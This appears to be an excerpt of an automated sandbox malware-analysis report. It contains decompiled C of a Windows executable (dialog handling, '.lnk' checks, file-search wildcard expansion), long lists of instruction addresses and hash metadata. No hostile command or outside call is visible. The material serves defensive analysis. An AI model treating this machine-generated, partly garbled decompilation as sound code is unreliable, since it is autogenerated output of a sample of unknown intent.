												__eflags = __esi;
												_push(__esi);
											}
											L111:
											__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x41946a);
											__eflags =  *(__ebp - 0x588c) - __bx;
											if( *(__ebp - 0x588c) == __bx) {
												goto L175;
											}
											L112:
											__eflags =  *0x41c575 - __bl;
											if( *0x41c575 != __bl) {
												goto L175;
											}
											L113:
											__eax = 0;
											 *(__ebp - 0x444) = __ax;
											__eax = __ebp - 0x588c;
											_push(0x2c);
											_push(__ebp - 0x588c);
											__eax = E003F22C6(__ecx);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												L120:
												__eflags =  *(__ebp - 0x444) - __bx;
												if( *(__ebp - 0x444) == __bx) {
													__ebp - 0x1b894 = __ebp - 0x588c;
													E003E0602(__ebp - 0x588c, __ebp - 0x1b894, 0x1000) = __ebp - 0x19894;
													__ebp - 0x444 = E003E0602(__ebp - 0x444, __ebp - 0x19894, 0x200);
												}
												__ebp - 0x588c = E003EADD2(__ebp - 0x588c);
												__eax = 0;
												 *(__ebp - 0x488c) = __ax;
												__ebp - 0x444 = __ebp - 0x588c;
												__eax = E003EA7E4( *(__ebp + 8), __ebp - 0x588c, __ebp - 0x444, 0x24);
												__eflags = __eax - 6;
												if(__eax != 6) {
													__eax = 0;
													 *0x418454 = 1;
													 *0x41946a = __ax;
													__eax = EndDialog( *(__ebp + 8), 1);
												}
												goto L175;
											}
											L114:
											__ax =  *(__ebp - 0x588c);
											__esi = __ebx;
											__eflags = __ax;
											if(__ax == 0) {
												goto L120;
											}
											L115:
											__ecx = __ax & 0x0000ffff;
											while(1) {
												L116:
												__eflags = __cx - 0x40;
												if(__cx == 0x40) {
													break;
												}
												L117:
												__eax =  *(__ebp + __esi * 2 - 0x588a) & 0x0000ffff;
												__esi =  &(__esi->i);
												__ecx = __eax;
												__eflags = __ax;
												if(__ax != 0) {
													continue;
												}
												L118:
												goto L120;
											}
											L119:
											__ebp - 0x588a = __ebp - 0x588a + __esi * 2;
											__ebp - 0x444 = E003E0602(__ebp - 0x444, __ebp - 0x444, 0x200);
											__eax = 0;
											__eflags = 0;
											 *(__ebp + __esi * 2 - 0x588c) = __ax;
											goto L120;
										case 8:
											L128:
											__eflags = __ebx - 3;
											if(__ebx == 3) {
												__eflags =  *(__ebp - 0x588c) - __di;
												if(__eflags != 0) {
													__eax = __ebp - 0x588c;
													_push(__ebp - 0x588c);
													__eax = E003F7625(__ebx, __edi);
													_pop(__ecx);
													 *0x42fc9c = __eax;
												}
												__eax = __ebp + 0xc;
												_push(__ebp + 0xc);
												 *0x42fc98 = E003EB48E(__ecx, __edx, __eflags);
											}
											 *0x41c576 = 1;
											goto L175;
										case 9:
											goto L0;
										case 0xa:
											L173:
											__eflags = __ebx - 7;
											if(__ebx == 7) {
												 *0x41a470 = 1;
											}
											goto L175;
										case 0xb:
											L81:
											__eax =  *(__ebp - 0x588c) & 0x0000ffff;
											__eax = E003F79E9( *(__ebp - 0x588c) & 0x0000ffff);
											__eflags = __eax - 0x46;
											if(__eax == 0x46) {
												 *0x418461 = 1;
											} else {
												__eflags = __eax - 0x55;
												if(__eax == 0x55) {
													 *0x418462 = 1;
												} else {
													__eax = 0;
													 *0x418461 = __al;
													 *0x418462 = __al;
												}
											}
											goto L175;
										case 0xc:
											L104:
											 *0x427b7a = 1;
											__eax = __eax + 0x427b7a;
											_t117 = __esi + 0x39;
											 *_t117 =  *(__esi + 0x39) + __esp;
											__eflags =  *_t117;
											__ebp = 0xffffa774;
											if( *_t117 != 0) {
												_t119 = __ebp - 0x588c; // 0xffff4ee8
												__eax = _t119;
												 *0x40e728 = E003E1FA7(_t119);
											}
											goto L175;
									}
									L2:
									_push(0x1000);
									_push(_t292);
									_push(_t226);
									_t226 = E003EAF98();
									_t292 = _t292 + 0x2000;
									_t290 = _t290 - 1;
									if(_t290 != 0) {
										goto L2;
									} else {
										_t293 = _t290;
										goto L4;
									}
								}
								L176:
								 *[fs:0x0] =  *((intOrPtr*)(_t297 - 0xc));
								return _t225;
							}
							goto L170;
						}
					}
					goto L175;
				}
			}










                0x003ed06a
                0x003ed06a
                0x003ed06a
                0x003ed06a
                0x003ed06d
                0x00000000
                0x00000000
                0x003ed073
                0x003ed073
                0x003ed075
                0x003ed07c
                0x003ed084
                0x003ed08a
                0x003ed08d
                0x003ed0b0
                0x003ed0b7
                0x003ed08f
                0x003ed08f
                0x003ed092
                0x003ed0a2
                0x003ed0a9
                0x003ed094
                0x003ed094
                0x003ed09b
                0x003ed09b
                0x003ed092
                0x003ed0bc
                0x003ed0ca
                0x003ed0cf
                0x003ed0d1
                0x003ed0d8
                0x003ed0e7
                0x003ed0ee
                0x003ed0f5
                0x003ed0f6
                0x003ed0fd
                0x003ed149
                0x003ed150
                0x003ed155
                0x003ed157
                0x00000000
                0x00000000
                0x003ed15d
                0x003ed15d
                0x003ed164
                0x003ed16a
                0x003ed16c
                0x003ed16f
                0x003ed221
                0x003ed221
                0x00000000
                0x003ed221
                0x003ed175
                0x003ed175
                0x003ed178
                0x003ed178
                0x003ed17a
                0x003ed17b
                0x003ed17e
                0x003ed188
                0x003ed188
                0x003ed18a
                0x003ed194
                0x003ed199
                0x003ed19b
                0x003ed1fd
                0x003ed1fd
                0x00000000
                0x003ed1fd
                0x003ed19d
                0x003ed1a4
                0x003ed1aa
                0x003ed1af
                0x003ed1b1
                0x00000000
                0x00000000
                0x003ed1b3
                0x003ed1b5
                0x003ed1b6
                0x003ed1b9
                0x003ed1bb
                0x003ed1be
                0x003ed1d4
                0x003ed1d6
                0x003ed1d8
                0x003ed1de
                0x003ed1de
                0x003ed1de
                0x003ed1e1
                0x00000000
                0x00000000
                0x003ed1db
                0x003ed1db
                0x003ed1db
                0x003ed1db
                0x003ed1e3
                0x003ed1e3
                0x003ed1e9
                0x003ed1eb
                0x003ed1f0
                0x003ed1f3
                0x003ed1f8
                0x00000000
                0x003ed1f8
                0x003ed1c0
                0x003ed1c0
                0x003ed1c7
                0x003ed1cc
                0x00000000
                0x003ed1cc
                0x003ed180
                0x003ed182
                0x003ed183
                0x003ed186
                0x00000000
                0x00000000
                0x00000000
                0x003ed200
                0x003ed200
                0x003ed203
                0x003ed206
                0x003ed208
                0x003ed208
                0x003ed211
                0x003ed216
                0x003ed218
                0x003ed21a
                0x003ed21c
                0x003ed21c
                0x00000000
                0x003ed0ff
                0x003ed0ff
                0x003ed107
                0x003ed113
                0x003ed11a
                0x003ed11b
                0x003ed120
                0x003ed121
                0x003ed122
                0x003ed124
                0x003ed12a
                0x003ed12c
                0x003ed13f
                0x003ed13f
                0x003ed226
                0x003ed226
                0x003ed22e
                0x003ed238
                0x003ed23f
                0x003ed23f
                0x003ed24c
                0x003ed253
                0x003ed258
                0x003ed260
                0x003ed26c
                0x003ed26c
                0x003ed279
                0x003ed27e
                0x003ed286
                0x003ed290
                0x003ed29d
                0x003ed2a4
                0x003ed2a4
                0x003ed2b1
                0x003ed2b8
                0x003ed2bd
                0x003ed2c5
                0x003ed2cb
                0x003ed2cd
                0x003ed2cd
                0x003ed2e2
                0x003ed2e7
                0x003ed2f3
                0x003ed2f5
                0x003ed306
                0x003ed313
                0x00000000
                0x003ed2f7
                0x003ed2f7
                0x003ed302
                0x003ed304
                0x003ed318
                0x003ed318
                0x003ed324
                0x003ed331
                0x003ed33d
                0x003ed344
                0x003ed349
                0x003ed350
                0x003ed356
                0x003ed35d
                0x003ed363
                0x003ed36a
                0x003ed36c
                0x003ed36e
                0x003ed370
                0x003ed372
                0x003ed378
                0x003ed37a
                0x003ed37c
                0x003ed37e
                0x003ed384
                0x003ed386
                0x003ed390
                0x003ed393
                0x003ed399
                0x003ed3a8
                0x003ed3ad
                0x003ed3b4
                0x003ed3b7
                0x003ed3c5
                0x003ed3c5
                0x003ed3d9
                0x003ed3d9
                0x003ed3d9
                0x003ed3de
                0x003ed3e2
                0x003ed3e6
                0x003ed3ed
                0x003ed3f4
                0x003ed3f7
                0x003ed3fc
                0x003ed3ff
                0x003ed404
                0x003ec795
                0x003ec79b
                0x003ec7a1
                0x003ec7a1
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ec7bb
                0x003ec7d2
                0x003ec7d6
                0x00000000
                0x003ec7d8
                0x00000000
                0x003ec7d8
                0x003ec7d6
                0x003ec7dd
                0x003ec7e0
                0x00000000
                0x00000000
                0x003ec7e6
                0x003ec7e6
                0x00000000
                0x003ec7ed
                0x003ec7ed
                0x003ec7f0
                0x003ec7f6
                0x003ec803
                0x003ec829
                0x003ec83d
                0x003ec840
                0x003ec84b
                0x003ec98f
                0x003ec98f
                0x003ec98f
                0x003ec99d
                0x003ec9a2
                0x003ec9a4
                0x00000000
                0x00000000
                0x003ec855
                0x003ec85d
                0x003ec863
                0x003ec869
                0x003ec90f
                0x003ec916
                0x003ec91c
                0x003ec91f
                0x00000000
                0x00000000
                0x003ec921
                0x003ec928
                0x003ec92e
                0x003ec930
                0x00000000
                0x003ec932
                0x003ec932
                0x003ec934
                0x003ec935
                0x003ec939
                0x003ec94d
                0x003ec952
                0x003ec95c
                0x003ec962
                0x003ec965
                0x003ec937
                0x003ec937
                0x003ec938
                0x00000000
                0x003ec967
                0x003ec975
                0x003ec97b
                0x003ec97d
                0x003ec989
                0x003ec989
                0x00000000
                0x003ec97d
                0x003ec965
                0x003ec930
                0x003ec86f
                0x003ec87e
                0x003ec88b
                0x003ec89c
                0x003ec89f
                0x003ec8a2
                0x003ec8b5
                0x003ec8bc
                0x003ec8c1
                0x003ec8c3
                0x00000000
                0x00000000
                0x003ec8c9
                0x003ec8d0
                0x003ec8d5
                0x003ec8da
                0x003ec8e6
                0x003ec8eb
                0x003ec8ee
                0x003ec8f5
                0x003ec8f7
                0x003ec8f8
                0x003ec902
                0x003ec908
                0x003ec909
                0x00000000
                0x003ec909
                0x003ec8a4
                0x003ec8ab
                0x003ec8b1
                0x003ec8b3
                0x00000000
                0x00000000
                0x00000000
                0x003ec8b3
                0x003ec9aa
                0x003ec9aa
                0x003ec9b4
                0x003ec9b4
                0x00000000
                0x00000000
                0x003ec9be
                0x003ec9be
                0x003ec9c0
                0x00000000
                0x003ec9c6
                0x003ec9c6
                0x003ec9cb
                0x003ec9cd
                0x003ec9d0
                0x003ec9d2
                0x003ec9df
                0x003ec9e4
                0x003ec9e5
                0x003ec9e5
                0x003ec9e6
                0x003ec9e9
                0x003ec9eb
                0x003ec9f5
                0x003ec9f8
                0x003ec9fe
                0x003eca00
                0x003ec9ed
                0x003ec9ed
                0x003ec9ed
                0x003eca05
                0x003eca07
                0x003eca10
                0x003eca10
                0x003eca12
                0x003eca13
                0x003eca18
                0x003eca21
                0x003eca22
                0x003eca28
                0x003eca2d
                0x003eca30
                0x003eca32
                0x003eca4b
                0x003eca4b
                0x003eca4d
                0x003eca54
                0x003eca59
                0x00000000
                0x003eca4d
                0x003eca34
                0x003eca34
                0x003eca39
                0x003eca3b
                0x003eca3d
                0x003eca3d
                0x003eca3f
                0x003eca3f
                0x003eca42
                0x003eca44
                0x003eca49
                0x003eca4a
                0x00000000
                0x003eca4a
                0x00000000
                0x003eca5f
                0x003eca5f
                0x003eca61
                0x003eca71
                0x003eca71
                0x00000000
                0x00000000
                0x003eca7c
                0x003eca7c
                0x003eca7e
                0x00000000
                0x00000000
                0x003eca84
                0x003eca84
                0x003eca8b
                0x00000000
                0x00000000
                0x003eca91
                0x003eca91
                0x003eca93
                0x003eca99
                0x003eca9b
                0x003ecaa2
                0x003ecaa3
                0x003ecaaa
                0x003ecaac
                0x003ecaac
                0x003ecab3
                0x003ecab8
                0x003ecabe
                0x003ecac0
                0x00000000
                0x003ecac6
                0x003ecac6
                0x003ecac6
                0x003ecac9
                0x003ecacb
                0x003ecacc
                0x003ecacf
                0x003ecaf8
                0x003ecaf8
                0x003ecafb
                0x003ecbe0
                0x003ecbe9
                0x003ecbee
                0x003ecbee
                0x003ecbf0
                0x003ecbf0
                0x003ecbf2
                0x003ecbf4
                0x003ecbfb
                0x003ecc00
                0x003ecc01
                0x003ecc02
                0x003ecc04
                0x003ecc06
                0x003ecc0a
                0x003ecc0c
                0x003ecc0c
                0x003ecc0e
                0x003ecc0e
                0x003ecc0a
                0x003ecc12
                0x003ecc18
                0x003ecc25
                0x003ecc2c
                0x003ecc3c
                0x003ecc46
                0x003ecc54
                0x003ecc5a
                0x003ecc62
                0x003ecc67
                0x003ecc68
                0x003ecc69
                0x003ecc6b
                0x003ecc7f
                0x003ecc7f
                0x00000000
                0x003ecc6b
                0x003ecb01
                0x003ecb01
                0x003ecb04
                0x003ecb11
                0x003ecb11
                0x003ecb14
                0x003ecb16
                0x003ecb17
                0x003ecb19
                0x003ecb1a
                0x003ecb1f
                0x003ecb24
                0x003ecb2a
                0x003ecb2c
                0x003ecb2e
                0x003ecb31
                0x003ecb38
                0x003ecb39
                0x003ecb3f
                0x003ecb40
                0x003ecb43
                0x003ecb44
                0x003ecb45
                0x003ecb4a
                0x003ecb4d
                0x003ecb53
                0x003ecb5c
                0x003ecb5f
                0x003ecb64
                0x003ecb66
                0x003ecb68
                0x003ecb6a
                0x003ecb6a
                0x003ecb6c
                0x003ecb6c
                0x003ecb6e
                0x003ecb6e
                0x003ecb76
                0x003ecb7d
                0x003ecb7f
                0x003ecb86
                0x003ecb8c
                0x003ecb8e
                0x003ecb8f
                0x003ecb97
                0x003ecba6
                0x003ecba6
                0x003ecb97
                0x003ecbb1
                0x003ecbb3
                0x003ecbc2
                0x003ecbc8
                0x003ecbce
                0x003ecbd9
                0x003ecbd9
                0x00000000
                0x003ecbce
                0x003ecb06
                0x003ecb06
                0x003ecb0b
                0x00000000
                0x00000000
                0x00000000
                0x003ecb0b
                0x003ecad1
                0x003ecad1
                0x003ecad5
                0x00000000
                0x00000000
                0x003ecad7
                0x003ecad7
                0x003ecada
                0x003ecadc
                0x003ecadf
                0x00000000
                0x00000000
                0x003ecae5
                0x003ecaee
                0x00000000
                0x003ecaee
                0x00000000
                0x003ecc8a
                0x003ecc8a
                0x003ecc8b
                0x003ecc90
                0x003ecc92
                0x003ecc95
                0x003ecc95
                0x00000000
                0x003ecccb
                0x003ecccb
                0x003eccd2
                0x003eccd4
                0x003eccd4
                0x003eccd6
                0x003ecd05
                0x003ecd05
                0x003ecd0b
                0x00000000
                0x003ecd0b
                0x003eccd8
                0x003eccd8
                0x003eccd8
                0x003eccdb
                0x003eccf4
                0x003eccf4
                0x003eccfa
                0x003eccfa
                0x00000000
                0x003eccfa
                0x003eccdd
                0x003eccdd
                0x003eccdd
                0x003ecce0
                0x00000000
                0x00000000
                0x003ecce2
                0x003ecce2
                0x003ecce2
                0x003ecce5
                0x00000000
                0x00000000
                0x003ecceb
                0x003ecceb
                0x00000000
                0x00000000
                0x003ecd58
                0x003ecd58
                0x003ecd5a
                0x003ecd61
                0x003ecd62
                0x003ecd68
                0x003ecd70
                0x003ecd72
                0x003ecd75
                0x003ece25
                0x003ece25
                0x003ece29
                0x003ece38
                0x003ece38
                0x003ece3c
                0x00000000
                0x00000000
                0x003ece42
                0x003ece42
                0x003ece45
                0x00000000
                0x00000000
                0x003ece4b
                0x003ece4b
                0x003ece4b
                0x003ece4d
                0x003ece4e
                0x003ece4e
                0x003ece4f
                0x003ece50
                0x003ece53
                0x00000000
                0x003ece53
                0x003ece2b
                0x003ece2b
                0x003ece2e
                0x00000000
                0x00000000
                0x003ece34
                0x003ece34
                0x00000000
                0x003ece34
                0x003ecd7b
                0x003ecd7b
                0x003ecd81
                0x003ecd83
                0x003ecd84
                0x003ecd89
                0x003ecd8a
                0x003ecd8b
                0x003ecd8d
                0x003ece22
                0x003ece22
                0x00000000
                0x003ece22
                0x003ecd93
                0x003ecd93
                0x003ecd93
                0x003ecd96
                0x003ecd99
                0x003ecd9b
                0x003ecd9e
                0x003ecda4
                0x003ecda6
                0x003ecda7
                0x003ecdad
                0x003ecdae
                0x003ecdb3
                0x003ecdb6
                0x003ecdb8
                0x00000000
                0x00000000
                0x003ecdba
                0x003ecdba
                0x003ecdbc
                0x003ecdbc
                0x003ecdbc
                0x003ecdc4
                0x00000000
                0x00000000
                0x003ecdc6
                0x003ecdcb
                0x003ecdd2
                0x003ecdd7
                0x003ecdde
                0x003ecde0
                0x003ecde2
                0x003ecde9
                0x003ecdee
                0x003ecdf0
                0x003ecdf2
                0x003ecdf4
                0x003ecdf4
                0x003ecdfa
                0x003ece01
                0x003ece06
                0x003ece08
                0x003ece0a
                0x003ece0c
                0x003ece0c
                0x003ece0d
                0x003ece0f
                0x003ece15
                0x003ece16
                0x003ece1c
                0x003ece1e
                0x003ece20
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ece20
                0x00000000
                0x00000000
                0x003ece87
                0x003ece87
                0x003ece8a
                0x003ed009
                0x003ed009
                0x003ed00c
                0x003ed012
                0x003ed018
                0x003ed01a
                0x003ed01a
                0x003ed024
                0x003ed024
                0x00000000
                0x003ed00c
                0x003ece90
                0x003ece90
                0x003ece96
                0x003ecea4
                0x003eceab
                0x003eceb0
                0x003eceb2
                0x003eceb4
                0x003eceb9
                0x003eceb9
                0x003eceb9
                0x003eced1
                0x003ecede
                0x003ecee3
                0x003ecee5
                0x00000000
                0x00000000
                0x003eceb7
                0x003eceb7
                0x003eceb7
                0x003eceb8
                0x003eceb8
                0x003ecee7
                0x003ecef1
                0x003ecef7
                0x003ecefe
                0x00000000
                0x00000000
                0x003ecf04
                0x003ecf04
                0x003ecf0a
                0x00000000
                0x00000000
                0x003ecf10
                0x003ecf10
                0x003ecf12
                0x003ecf19
                0x003ecf1f
                0x003ecf21
                0x003ecf22
                0x003ecf27
                0x003ecf28
                0x003ecf29
                0x003ecf2b
                0x003ecf7b
                0x003ecf7b
                0x003ecf82
                0x003ecf90
                0x003ecfa1
                0x003ecfaf
                0x003ecfaf
                0x003ecfbb
                0x003ecfc0
                0x003ecfc2
                0x003ecfd2
                0x003ecfdc
                0x003ecfe1
                0x003ecfe4
                0x003ecfef
                0x003ecff1
                0x003ecff8
                0x003ecffe
                0x003ecffe
                0x00000000
                0x003ecfe4
                0x003ecf2d
                0x003ecf2d
                0x003ecf34
                0x003ecf36
                0x003ecf39
                0x00000000
                0x00000000
                0x003ecf3b
                0x003ecf3b
                0x003ecf3e
                0x003ecf3e
                0x003ecf3e
                0x003ecf42
                0x00000000
                0x00000000
                0x003ecf44
                0x003ecf44
                0x003ecf4c
                0x003ecf4d
                0x003ecf4f
                0x003ecf52
                0x00000000
                0x00000000
                0x003ecf54
                0x00000000
                0x003ecf54
                0x003ecf56
                0x003ecf61
                0x003ecf6c
                0x003ecf71
                0x003ecf71
                0x003ecf73
                0x00000000
                0x00000000
                0x003ed030
                0x003ed030
                0x003ed033
                0x003ed035
                0x003ed03c
                0x003ed03e
                0x003ed044
                0x003ed045
                0x003ed04a
                0x003ed04b
                0x003ed04b
                0x003ed050
                0x003ed053
                0x003ed059
                0x003ed059
                0x003ed05e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ed3cd
                0x003ed3cd
                0x003ed3d0
                0x003ed3d2
                0x003ed3d2
                0x00000000
                0x00000000
                0x003ecd17
                0x003ecd17
                0x003ecd1f
                0x003ecd25
                0x003ecd28
                0x003ecd4c
                0x003ecd2a
                0x003ecd2a
                0x003ecd2d
                0x003ecd40
                0x003ecd2f
                0x003ecd2f
                0x003ecd31
                0x003ecd36
                0x003ecd36
                0x003ecd2d
                0x00000000
                0x00000000
                0x003ece5d
                0x003ece5d
                0x003ece5e
                0x003ece63
                0x003ece63
                0x003ece63
                0x003ece66
                0x003ece6b
                0x003ece71
                0x003ece71
                0x003ece7d
                0x003ece7d
                0x00000000
                0x00000000
                0x003ec7a2
                0x003ec7a2
                0x003ec7a7
                0x003ec7a8
                0x003ec7a9
                0x003ec7ae
                0x003ec7b4
                0x003ec7b7
                0x00000000
                0x003ec7b9
                0x003ec7b9
                0x00000000
                0x003ec7b9
                0x003ec7b7
                0x003ed40a
                0x003ed410
                0x003ed418
                0x003ed418
                0x00000000
                0x003ed304
                0x003ed2f5
                0x00000000
                0x003ed0fd

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcschr
                • String ID: .lnk$d>
                • API String ID: 2691759472-1677865091
                • Opcode ID: 8566673aa9f9f2dbb927f202ef2c171cc2f4fe770452fc3f2ac80cbf69d17a8d
                • Instruction ID: a38942c6fc06a5a7dd83baa4ed479a408265df91e28638be0fbc250e2e6120a3
                • Opcode Fuzzy Hash: 8566673aa9f9f2dbb927f202ef2c171cc2f4fe770452fc3f2ac80cbf69d17a8d
                • Instruction Fuzzy Hash: 20A141729001799ADF26DBA1DD45EFA73FCEF44304F0886A6B509E7181EF749B848B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FB1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E003FB1B8(signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t136;
				void* _t138;
				signed int _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int* _t147;
				signed int _t150;
				void* _t153;
				CHAR* _t154;
				void* _t155;
				char _t157;
				char _t159;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr* _t164;
				signed int _t166;
				void* _t168;
				intOrPtr* _t169;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t183;
				void* _t192;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t198;
				signed int _t200;
				union _FINDEX_INFO_LEVELS _t201;
				void* _t202;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				void* _t211;
				intOrPtr _t212;
				void* _t213;
				void* _t214;
				signed int _t217;
				void* _t219;
				signed int _t220;
				void* _t221;
				void* _t222;
				void* _t223;
				signed int _t224;
				void* _t225;
				void* _t226;

				_t80 = _a8;
				_t222 = _t221 - 0x20;
				if(_t80 != 0) {
					_t206 = _a4;
					_t159 = 0;
					 *_t80 = 0;
					_t197 = 0;
					_t150 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t206;
					if( *_t206 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t150 - _t197;
						_v8 = _t159;
						_t190 = (_t82 >> 2) + 1;
						__eflags = _t150 - _t197;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t208 =  !_t206 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t208;
						if(_t208 != 0) {
							_t195 = _t197;
							_t157 = _t159;
							do {
								_t183 =  *_t195;
								_t17 = _t183 + 1; // 0x1
								_v8 = _t17;
								do {
									_t142 =  *_t183;
									_t183 = _t183 + 1;
									__eflags = _t142;
								} while (_t142 != 0);
								_t157 = _t157 + 1 + _t183 - _v8;
								_t195 = _t195 + 4;
								_t144 = _v12 + 1;
								_v12 = _t144;
								__eflags = _t144 - _t208;
							} while (_t144 != _t208);
							_t190 = _v16;
							_v8 = _t157;
							_t150 = _v336.cAlternateFileName;
						}
						_t209 = E003F8207(_t190, _v8, 1);
						_t223 = _t222 + 0xc;
						__eflags = _t209;
						if(_t209 != 0) {
							_t87 = _t209 + _v16 * 4;
							_v20 = _t87;
							_t191 = _t87;
							_v16 = _t87;
							__eflags = _t197 - _t150;
							if(_t197 == _t150) {
								L23:
								_t198 = 0;
								__eflags = 0;
								 *_a8 = _t209;
								goto L24;
							} else {
								_t93 = _t209 - _t197;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t162 =  *_t197;
									_v12 = _t162 + 1;
									do {
										_t95 =  *_t162;
										_t162 = _t162 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t163 = _t162 - _v12;
									_t35 = _t163 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E003FF101(_t163, _t191, _v20 - _t191 + _v8,  *_t197);
									_t223 = _t223 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E003F9097();
										asm("int3");
										_t219 = _t223;
										_push(_t163);
										_t164 = _v64;
										_t47 = _t164 + 1; // 0x1
										_t192 = _t47;
										do {
											_t103 =  *_t164;
											_t164 = _t164 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t197);
										_t200 = _a8;
										_t166 = _t164 - _t192 + 1;
										_v12 = _t166;
										__eflags = _t166 - (_t103 | 0xffffffff) - _t200;
										if(_t166 <= (_t103 | 0xffffffff) - _t200) {
											_push(_t150);
											_t50 = _t200 + 1; // 0x1
											_t153 = _t50 + _t166;
											_t211 = E003FB136(_t166, _t153, 1);
											_t168 = _t209;
											__eflags = _t200;
											if(_t200 == 0) {
												L34:
												_push(_v12);
												_t153 = _t153 - _t200;
												_t108 = E003FF101(_t168, _t211 + _t200, _t153, _v0);
												_t224 = _t223 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t136 = E003FB587(_a12, _t192, __eflags, _t211);
													E003F8DCC(0);
													_t138 = _t136;
													goto L36;
												}
											} else {
												_push(_t200);
												_t139 = E003FF101(_t168, _t211, _t153, _a4);
												_t224 = _t223 + 0x10;
												__eflags = _t139;
												if(_t139 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E003F9097();
													asm("int3");
													_push(_t219);
													_t220 = _t224;
													_t225 = _t224 - 0x150;
													_t111 =  *0x40e7ac; // 0xc24f6281
													_v116 = _t111 ^ _t220;
													_t169 = _v100;
													_push(_t153);
													_t154 = _v104;
													_push(_t211);
													_t212 = _v96;
													_push(_t200);
													_v440 = _t212;
													while(1) {
														__eflags = _t169 - _t154;
														if(_t169 == _t154) {
															break;
														}
														_t113 =  *_t169;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t169 = E003FF150(_t154, _t169);
																	continue;
																}
															}
														}
														break;
													}
													_t193 =  *_t169;
													__eflags = _t193 - 0x3a;
													if(_t193 != 0x3a) {
														L47:
														_t201 = 0;
														__eflags = _t193 - 0x2f;
														if(_t193 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t193 - 0x5c;
															if(_t193 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t193 - 0x3a;
																if(_t193 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
														E003EFFF0(_t201,  &_v336, _t201, 0x140);
														_t226 = _t225 + 0xc;
														_t213 = FindFirstFileExA(_t154, _t201,  &_v336, _t201, _t201, _t201);
														_t123 = _v340;
														__eflags = _t213 - 0xffffffff;
														if(_t213 != 0xffffffff) {
															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t173;
															_v348 = _t173 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t154);
																	_push(_t123);
																	L28();
																	_t226 = _t226 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t177 = _v291;
																	__eflags = _t177;
																	if(_t177 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t177 - 0x2e;
																		if(_t177 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t213,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t193 =  *_t123;
															_t178 = _v348;
